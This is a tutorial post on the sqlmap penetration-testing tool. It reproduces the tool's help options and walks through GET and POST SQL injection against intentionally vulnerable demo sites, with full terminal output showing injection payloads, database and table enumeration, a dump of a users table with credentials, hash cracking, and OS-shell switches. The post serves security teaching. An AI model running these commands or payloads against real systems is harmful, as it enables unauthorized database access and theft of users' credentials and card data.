What is SQLMap
sqlmap is an open source penetration testing tool developed by Bernardo Damele Assumpcao Guimaraes and Miroslav Stampar that automates the process of detecting and exploiting SQL injection flaws and taking over database servers.
It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.
How to use SQLMap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
┌──(dyl4n㉿kali)-[/]
└─$ sqlmap -h
___
__H__
___ ___[)]_____ ___ ___ {1.7.2#stable}
|_ -| . [,] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
Usage: python3 sqlmap [options]
Options:
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show programs version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be provided to define the
target(s)
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-g GOOGLEDORK Process Google dork results as target URLs
Request:
These options can be used to specify how to connect to the target URL
--data=DATA Data string to be sent through POST (e.g. "id=1")
--cookie=COOKIE HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--random-agent Use randomly selected HTTP User-Agent header value
--proxy=PROXY Use a proxy to connect to the target URL
--tor Use Tor anonymity network
--check-tor Check to see if Tor is used properly
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to provided value
Detection:
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques
--technique=TECH.. SQL injection techniques to use (default "BEUSTQ")
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables
-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--passwords Enumerate DBMS users password hashes
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate
Operating system access:
These options can be used to access the back-end database management
system underlying operating system
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter or VNC
General:
These options can be used to set some general working parameters
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target
Miscellaneous:
These options do not fit into any other category
--wizard Simple wizard interface for beginner users
[!] to see full list of options run with '-hh'
Basic Commands:
Options | Description |
---|---|
-u URL, --url=URL | Target URL (e.g. “http://www.site.com/vuln.php?id=1”) |
--data=DATA | Data string to be sent through POST (e.g. “id=1”) |
--random-agent | Use randomly selected HTTP User-Agent header value |
-p TESTPARAMETER | Testable parameter(s) |
--level=LEVEL | Level of tests to perform (1-5, default 1) |
--risk=RISK | Risk of tests to perform (1-3, default 1) |
Enumeration commands:
Options | Description |
---|---|
-a, --all | Retrieve everything |
-b, --banner | Retrieve DBMS banner |
--current-user | Retrieve DBMS current user |
--current-db | Retrieve DBMS current database |
--passwords | Enumerate DBMS users password hashes |
--dbs | Enumerate DBMS databases |
--tables | Enumerate DBMS database tables |
--columns | Enumerate DBMS database table columns |
--schema | Enumerate DBMS schema |
--dump | Dump DBMS database table entries |
--dump-all | Dump all DBMS databases tables entries |
--is-dba | Detect if the DBMS current user is DBA |
-D <DB NAME> | DBMS database to enumerate |
-T <TABLE NAME> | DBMS database table(s) to enumerate |
-C COL | DBMS database table column(s) to enumerate |
Operating System access commands
Options | Description |
---|---|
--os-shell | Prompt for an interactive operating system shell |
--os-pwn | Prompt for an OOB shell, Meterpreter or VNC |
--os-cmd=OSCMD | Execute an operating system command |
--priv-esc | Database process user privilege escalation |
--os-smbrelay | One-click prompt for an OOB shell, Meterpreter or VNC |
Note that the tables shown above aren’t all the possible switches to use with sqlmap. For a more extensive list of options, run sqlmap -hh to display the advanced help message.
Demo
GET based Method
Browse to target site http://testphp.vulnweb.com/. Using sqlmap to retrieve login data from website
(This is a demo website so you can try it out.)
Open terminal and enter the below command
1
sqlmap -u "http://testphp.vulnweb.com/search.php?test=query"
-u
: the target site url The SQLMap’ll detect the target’s vulnerabilities and return the information of them.1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33
┌──(dyl4n㉿kali)-[/] └─$ sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" ___ __H__ ___ ___["]_____ ___ ___ {1.7.2#stable} |_ -| . [(] | .'| . | |___|_ ["]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 04:53:43 /2023-04-20/ [04:53:43] [INFO] resuming back-end DBMS 'mysql' [04:53:43] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: test (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: test=query' AND (SELECT 8297 FROM (SELECT(SLEEP(5)))EfaF) AND 'ekJi'='ekJi Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: test=query' UNION ALL SELECT NULL,CONCAT(0x7170627671,0x644b7762646447676e584f55746d49474a424d47796457714777664474694d624163684657445368,0x71626a7671),NULL-- - --- [04:53:44] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Nginx 1.19.0, PHP 5.6.40 back-end DBMS: MySQL >= 5.0.12 [04:53:44] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/testphp.vulnweb.com' [*] ending @ 04:53:44 /2023-04-20/
=> There’s
time-based blind
sqli detected in the systemProceed to find the database name once it is determined that the target has sqli vulnerability
1
sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" --dbs
--dbs
: enumerate DBMS database1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38
┌──(dyl4n㉿kali)-[/] └─$ sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" --dbs ___ __H__ ___ ___[.]_____ ___ ___ {1.7.2#stable} |_ -| . ['] | .'| . | |___|_ [,]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 05:02:21 /2023-04-20/ [05:02:21] [INFO] resuming back-end DBMS 'mysql' [05:02:24] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: test (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: test=query' AND (SELECT 8297 FROM (SELECT(SLEEP(5)))EfaF) AND 'ekJi'='ekJi Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: test=query' UNION ALL SELECT NULL,CONCAT(0x7170627671,0x644b7762646447676e584f55746d49474a424d47796457714777664474694d624163684657445368,0x71626a7671),NULL-- - --- [05:02:24] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Nginx 1.19.0, PHP 5.6.40 back-end DBMS: MySQL >= 5.0.12 [05:02:24] [INFO] fetching database names available databases [2]: [*] acuart [*] information_schema [05:02:24] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/testphp.vulnweb.com' [*] ending @ 05:02:24 /2023-04-20/
After successfully determining the database name, we’ll enumerate database tables from it
1
sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" -D acuart --tables
-D
: DBMS database name to enumerate--tables
: Enumerate DBMS database tables1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48
┌──(dyl4n㉿kali)-[/] └─$ sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" -D acuart --tables ___ __H__ ___ ___[']_____ ___ ___ {1.7.2#stable} |_ -| . [.] | .'| . | |___|_ [,]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 05:06:09 /2023-04-20/ [05:06:09] [INFO] resuming back-end DBMS 'mysql' [05:06:12] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: test (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: test=query' AND (SELECT 8297 FROM (SELECT(SLEEP(5)))EfaF) AND 'ekJi'='ekJi Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: test=query' UNION ALL SELECT NULL,CONCAT(0x7170627671,0x644b7762646447676e584f55746d49474a424d47796457714777664474694d624163684657445368,0x71626a7671),NULL-- - --- [05:06:16] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Nginx 1.19.0, PHP 5.6.40 back-end DBMS: MySQL >= 5.0.12 [05:06:16] [INFO] fetching tables for database: 'acuart' Database: acuart [8 tables] +-----------+ | artists | | carts | | categ | | featured | | guestbook | | pictures | | products | | users | +-----------+ [05:06:16] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/testphp.vulnweb.com' [*] ending @ 05:06:16 /2023-04-20/
Enumerate columns from table
As we see in the table list, maybe the
users
contains the login information, so let’s retrieve columns from it:1
sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" -D acuart -T users --columns
-T
: the table to enumerate--columns
: enumerate database table columns1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50
┌──(dyl4n㉿kali)-[/] └─$ sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" -D acuart -T users --columns ___ __H__ ___ ___[(]_____ ___ ___ {1.7.2#stable} |_ -| . [.] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 05:16:53 /2023-04-20/ [05:16:53] [INFO] resuming back-end DBMS 'mysql' [05:16:55] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: test (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: test=query' AND (SELECT 8297 FROM (SELECT(SLEEP(5)))EfaF) AND 'ekJi'='ekJi Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: test=query' UNION ALL SELECT NULL,CONCAT(0x7170627671,0x644b7762646447676e584f55746d49474a424d47796457714777664474694d624163684657445368,0x71626a7671),NULL-- - --- [05:16:58] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Nginx 1.19.0, PHP 5.6.40 back-end DBMS: MySQL >= 5.0.12 [05:16:58] [INFO] fetching columns for table 'users' in database 'acuart' Database: acuart Table: users [8 columns] +---------+--------------+ | Column | Type | +---------+--------------+ | address | mediumtext | | cart | varchar(100) | | cc | varchar(100) | | email | varchar(100) | | name | varchar(100) | | pass | varchar(100) | | phone | varchar(100) | | uname | varchar(100) | +---------+--------------+ [05:16:58] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/testphp.vulnweb.com' [*] ending @ 05:16:58 /2023-04-20/
In the users table, there are uname and pass fields that most likely contain the account name and password to log in to the system
Retrieve data from table
1
sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" -D acuart -T users --dump
-dump
: Dump database table entries1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60
┌──(kali㉿B20DCAT037-Dat-Kali)-[/] └─$ sqlmap -u "http://testphp.vulnweb.com/search.php?test=query" -D acuart -T users --dump ___ __H__ ___ ___["]_____ ___ ___ {1.7.2#stable} |_ -| . [,] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 05:34:30 /2023-04-20/ [05:34:30] [INFO] resuming back-end DBMS 'mysql' [05:34:30] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: test (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: test=query' AND (SELECT 8297 FROM (SELECT(SLEEP(5)))EfaF) AND 'ekJi'='ekJi Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: test=query' UNION ALL SELECT NULL,CONCAT(0x7170627671,0x644b7762646447676e584f55746d49474a424d47796457714777664474694d624163684657445368,0x71626a7671),NULL-- - --- [05:34:31] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Nginx 1.19.0, PHP 5.6.40 back-end DBMS: MySQL >= 5.0.12 [05:34:31] [INFO] fetching columns for table 'users' in database 'acuart' [05:34:31] [INFO] fetching entries for table 'users' in database 'acuart' [05:34:31] [INFO] recognized possible password hashes in column 'cart' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] do you want to crack them via a dictionary-based attack? [Y/n/q] [05:34:32] [INFO] using hash method 'md5_generic_passwd' what dictionary do you want to use? [1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > [05:34:33] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] [05:34:33] [INFO] starting dictionary-based cracking (md5_generic_passwd) [05:34:33] [INFO] starting 8 processes [05:34:38] [WARNING] no clear password(s) found Database: acuart Table: users [1 entry] +---------------------+----------------------------------+------------+------+-----------------+---------+-------+-----------+ | cc | cart | name | pass | email | phone | uname | address | +---------------------+----------------------------------+------------+------+-----------------+---------+-------+-----------+ | 1234-5678-2300-9000 | 3cc3ee99b47d7b86b90426a8e9c3dcb8 | John Smith | test | email@email.com | 2323345 | test | 21 street | +---------------------+----------------------------------+------------+------+-----------------+---------+-------+-----------+ [05:34:38] [INFO] table 'acuart.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv' [05:34:38] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/testphp.vulnweb.com' [*] ending @ 05:34:38 /2023-04-20/
We get an entry that has uname is ‘test’ and pass is ‘test’. Try using it, we’ll login successfully.
Post based Method
We’ll using http://testasp.vulnweb.com/Login.asp as demo. (This site is free to attack so you can try it)
Browse to the target site.
Use
sqlmap
with-r
flag to read file to get the information to attack in the POST request.-p
is the parameter we are attacking.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
┌──(dyl4n㉿kali)-[~]
└─$ sqlmap -r req.txt -p tfUPass
___
__H__
___ ___[)]_____ ___ ___ {1.7.2#stable}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:26:50 /2023-04-20/
[13:26:52] [INFO] parsing HTTP request from 'search-test.txt'
[13:26:52] [WARNING] the testable parameter 'tfUPass' you provided is not into the GET
[13:26:52] [WARNING] the testable parameter 'tfUPass' you provided is not into the Cookie
[13:26:52] [INFO] using '/home/testuser/sqlmap/output/testasp.vulnweb.com/session' as session file
[13:26:52] [INFO] resuming injection data from session file
[13:26:52] [WARNING] there is an injection in POST parameter 'tfUName' but you did not provided it this time
[13:26:52] [INFO] testing connection to the target url
[13:26:53] [INFO] testing if the url is stable, wait a few seconds
[13:26:55] [INFO] url is stable
[13:26:55] [WARNING] heuristic test shows that POST parameter 'tfUPass' might not be injectable
[13:26:55] [INFO] testing sql injection on POST parameter 'tfUPass'
[13:26:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:27:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:27:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:27:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[13:27:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:27:12] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:27:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[13:27:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:27:30] [INFO] POST parameter 'tfUPass' is 'Microsoft SQL Server/Sybase stacked queries' injectable
[13:27:30] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:27:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[13:27:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[13:27:42] [INFO] POST parameter 'tfUPass' is 'Microsoft SQL Server/Sybase time-based blind' injectable
[13:27:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[13:27:48] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:27:48] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
sqlmap got a 302 redirect to /Search.asp - What target address do you want to use from now on? http://testasp.vulnweb.com:80/Login.asp (default) or provide another target address based also on the redirection got from the application
>
[13:27:58] [INFO] target url appears to be UNION injectable with 2 columns
POST parameter 'tfUPass' is vulnerable. Do you want to keep testing the others? [y/N] N
sqlmap identified the following injection points with a total of 68 HTTP(s) requests:
---
Place: POST
Parameter: tfUPass
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: tfUName=test&tfUPass=test'; WAITFOR DELAY '0:0:5';-- AND 'mPfC'='mPfC
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: tfUName=test&tfUPass=test' WAITFOR DELAY '0:0:5'-- AND 'wpkc'='wpkc
---
[13:28:08] [INFO] testing MySQL
[13:28:09] [WARNING] the back-end DBMS is not MySQL
[13:28:09] [INFO] testing Oracle
[13:28:10] [WARNING] the back-end DBMS is not Oracle
[13:28:10] [INFO] testing PostgreSQL
[13:28:10] [WARNING] the back-end DBMS is not PostgreSQL
[13:28:10] [INFO] testing Microsoft SQL Server
[13:28:16] [INFO] confirming Microsoft SQL Server
[13:28:28] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
[13:28:28] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 42 times
[13:28:28] [INFO] Fetched data logged to text files under '/home/testuser/sqlmap/output/testasp.vulnweb.com'
[*] shutting down at: 13:28:28